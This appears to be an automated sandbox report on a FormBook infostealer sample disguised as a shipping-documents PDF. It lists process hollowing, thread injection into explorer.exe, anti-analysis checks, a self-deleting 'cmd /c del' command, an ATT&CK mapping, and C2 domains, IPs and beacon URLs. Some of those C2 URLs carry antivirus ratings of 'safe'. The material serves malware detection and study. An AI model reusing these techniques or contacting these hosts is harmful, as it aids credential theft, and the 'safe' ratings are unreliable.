      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03538E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03548EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035336CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035316E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035176E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035846A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03527D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03543D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035B3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632C6 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 68.70.163.36 80
      Source: C:\Windows\explorer.exeNetwork Connect: 156.224.66.93 80
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread register set: target process: 3388
      Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3388
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: C90000
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: explorer.exe, 00000003.00000002.485221215.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000003.00000002.500202278.0000000006860000.00000004.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F1083 cpuid
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeQueries volume information: C:\ VolumeInformation

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: wlanext.exe PID: 5896, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery721Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22Input Capture1Virtualization/Sandbox Evasion22Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Information Discovery321SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 320999 Sample: Shipping Documents (INV,PL,... Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 29 www.leepl.com 2->29 31 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 2->31 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 12 other signatures 2->47 11 Shipping Documents (INV,PL,BL)_pdf.exe 1 2->11         started        signatures3 process4 signatures5 57 Tries to detect Any.run 11->57 59 Hides threads from debuggers 11->59 14 Shipping Documents (INV,PL,BL)_pdf.exe 6 11->14         started        process6 dnsIp7 39 lifeandhealth.com.mx 192.185.170.106, 443, 49699 UNIFIEDLAYER-AS-1US United States 14->39 61 Modifies the context of a thread in another process (thread injection) 14->61 63 Tries to detect Any.run 14->63 65 Maps a DLL or memory area into another process 14->65 67 3 other signatures 14->67 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 33 www.iatlet.com 156.224.66.93, 49707, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->33 35 drinksandfruits.com 68.70.163.36, 49706, 80 NETSOURCEUS United States 18->35 37 www.drinksandfruits.com 18->37 49 System process connects to network (likely due to code injection or exploit) 18->49 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Shipping Documents (INV,PL,BL)_pdf.exe21%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      lifeandhealth.com.mx0%VirustotalBrowse
      drinksandfruits.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.smartbulk.store0%Avira URL Cloudsafe
      http://www.faithinfitness.net0%Avira URL Cloudsafe
      https://lifeandhealth.com.mx/)100%Avira URL Cloudmalware
      http://www.cannahavedessert.com/icm9/www.kalcio.site0%Avira URL Cloudsafe
      http://www.faithinfitness.net/icm9/0%Avira URL Cloudsafe
      http://www.nationalcanopies.com/icm9/www.cannahavedessert.com0%Avira URL Cloudsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.smartbulk.store/icm9/0%Avira URL Cloudsafe
      http://www.iatlet.comReferer:0%Avira URL Cloudsafe
      http://www.84streetchamber.comReferer:0%Avira URL Cloudsafe
      http://www.iatlet.com/icm9/www.leepl.com0%Avira URL Cloudsafe
      http://www.drinksandfruits.comReferer:0%Avira URL Cloudsafe
      http://www.leepl.com0%Avira URL Cloudsafe
      http://www.faithinfitness.netReferer:0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.iatlet.com/icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr0%Avira URL Cloudsafe
      http://www.nationalcanopies.com/icm9/0%Avira URL Cloudsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.faithinfitness.net/icm9/www.hunexhq.icu0%Avira URL Cloudsafe
      http://www.frontierautoglasswheatfield.com0%Avira URL Cloudsafe
      http://www.84streetchamber.com/icm9/0%Avira URL Cloudsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
      http://www.images77.com/icm9/0%Avira URL Cloudsafe
      http://www.mademoisellepierre.com0%Avira URL Cloudsafe
      http://www.images77.com0%Avira URL Cloudsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://www.cannahavedessert.com/icm9/0%Avira URL Cloudsafe
      http://www.gcsisgreen.com/icm9/0%Avira URL Cloudsafe
      http://www.iatlet.com0%Avira URL Cloudsafe
      http://www.images77.comReferer:0%Avira URL Cloudsafe
      http://www.frontierautoglasswheatfield.com/icm9/0%Avira URL Cloudsafe
      http://www.84streetchamber.com0%Avira URL Cloudsafe
      http://www.gcsisgreen.com/icm9/www.smartbulk.store0%Avira URL Cloudsafe
      http://www.hunexhq.icu0%Avira URL Cloudsafe
      http://www.leepl.com/icm9/www.nationalcanopies.com0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.drinksandfruits.com/icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr0%Avira URL Cloudsafe
      http://www.machevate.com0%Avira URL Cloudsafe
      http://www.verifyinstagram-help.com/icm9/0%Avira URL Cloudsafe
      http://www.hunexhq.icu/icm9/0%Avira URL Cloudsafe
      http://www.kalcio.site/icm9/www.mademoisellepierre.com0%Avira URL Cloudsafe
      http://www.drinksandfruits.com/icm9/0%Avira URL Cloudsafe
      http://www.verifyinstagram-help.com/icm9/www.faithinfitness.net0%Avira URL Cloudsafe
      http://www.frontierautoglasswheatfield.comReferer:0%Avira URL Cloudsafe
      http://www.leepl.com/icm9/0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.kalcio.siteReferer:0%Avira URL Cloudsafe
      http://www.mademoisellepierre.com/icm9/0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.machevate.com/icm9/0%Avira URL Cloudsafe
      http://www.verifyinstagram-help.comReferer:0%Avira URL Cloudsafe
      http://www.gcsisgreen.comReferer:0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.84streetchamber.com/icm9/www.verifyinstagram-help.com0%Avira URL Cloudsafe
      http://www.kalcio.site0%Avira URL Cloudsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.images77.com/icm9/www.gcsisgreen.com0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.machevate.comReferer:0%Avira URL Cloudsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.mademoisellepierre.comReferer:0%Avira URL Cloudsafe
      http://www.drinksandfruits.com0%Avira URL Cloudsafe
      http://www.smartbulk.storeReferer:0%Avira URL Cloudsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.cannahavedessert.com0%Avira URL Cloudsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      lifeandhealth.com.mx
      192.185.170.106
      truefalseunknown
      HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
      3.223.115.185
      truefalse
        high
        drinksandfruits.com
        68.70.163.36
        truetrueunknown
        www.iatlet.com
        156.224.66.93
        truetrue
          unknown
          www.drinksandfruits.com
          unknown
          unknowntrue
            unknown
            www.leepl.com
            unknown
            unknowntrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.iatlet.com/icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVrtrue
              • Avira URL Cloud: safe
              unknown
              http://www.drinksandfruits.com/icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVrtrue
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.smartbulk.storeexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.faithinfitness.netexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://lifeandhealth.com.mx/)Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.cannahavedessert.com/icm9/www.kalcio.siteexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.faithinfitness.net/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                high
                http://www.nationalcanopies.com/icm9/www.cannahavedessert.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.smartbulk.store/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.iatlet.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.84streetchamber.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.iatlet.com/icm9/www.leepl.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.drinksandfruits.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.leepl.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://cert.int-x3.letsencrypt.org/0Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpfalse
                  high
                  http://www.faithinfitness.netReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.nationalcanopies.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.faithinfitness.net/icm9/www.hunexhq.icuexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.frontierautoglasswheatfield.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.84streetchamber.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://cps.root-x1.letsencrypt.org0Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.images77.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.mademoisellepierre.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.images77.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://cps.letsencrypt.org0Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.cannahavedessert.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.gcsisgreen.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.iatlet.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.images77.comReferer:explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.frontierautoglasswheatfield.com/icm9/explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.84streetchamber.comexplorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
